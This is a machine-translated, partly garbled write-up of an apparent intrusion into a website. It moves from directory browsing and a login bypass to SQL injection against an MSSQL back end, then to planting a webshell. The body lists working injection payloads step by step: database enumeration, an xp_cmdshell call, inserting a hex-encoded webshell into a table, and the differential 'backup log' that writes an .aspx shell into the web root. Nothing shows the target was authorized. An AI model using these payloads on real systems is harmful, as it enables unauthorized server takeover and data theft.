0x00 Preface
Scanner Scan to a website exists directory browsing, so there is this article ...
Knowledge Point Popular Science:
1. Directory browsing
Directory browsing in my personal view is a significant vulnerability, the vulnerability is "in the absence of a default document directory, all file names and files in this directory," if the site has such a misconfiguration, if the attacker knows the directory name, you can view the files under these directories.
2. Differential backup conditions
- Site Absolute Path
- Have path Write permission
- Have current database permissions
0X01 body
Improper configuration of the site, resulting in directory browsing, by looking at the first page of the source code, turned to several directories
Random access to the one, the discovery will error, indicating that the webmaster did not block the error message
There is also an information leak.
But usually the files in the directory need to pass parameters to execute, we do not know the parameter name, so there is no way to use
Go back to the front desk login screen to view
Try to find the password at the presence of injection and weak password admin, that is, you can log in with a universal password
Originally wanted to find a file upload, direct Getshell, but found that does not exist, but found that the site used kindeditor and site absolute path
Then there is injection at the front of the login port, the background is generally also a lot of injections, try to find, if there is, with the absolute path can be Getshell
Okok, found injected, but so far do not know what type of database, General Aspx+mssql, because the previous discovery can be an error, then try to use MSSQL error mode
%‘ and [email protected]@version --a
MSSQL database, check the current user identity
%‘ and 1=user --a
The dbo permission is not SA, try Xp_cmdshell
%‘;exec(‘master..xp_cmdshell whoami‘) --a
xp_cmdshell is not turned on, and dbo's permissions are not sufficient to open xp_cmdshell, you can only try to write a Webshell by using a differential backup
1. Get the current database name
%‘ and 1=db_name() --a
2. Backing up the current database
If the backup is successful, the Web page returns the query result of% ' (because it is stacked and the execution of subsequent statements does not return results)
3. Create a table and write to Webshell
%‘;create table cmd(a image) --a%‘;insert into cmd(a) values (0xxxxx) --a //webshell的hex值
Can use the tools of the Internet, the author used to develop their own gadgets
4. Make a second backup
%‘;backup log 数据库名称 to disk = ‘绝对路径\\abc.aspx‘--
Here I will write the Webshell to the subdirectory, because there is a directory browsing, can see exactly whether the file generated
After a successful creation, try to connect
0x02 Follow-up
- If you can use xp_cmdshell directly, try not to use differential backup, because the backup file will be generated, if the database is large, it will affect
- Have any errors, please treatise
One differential backup take the shell process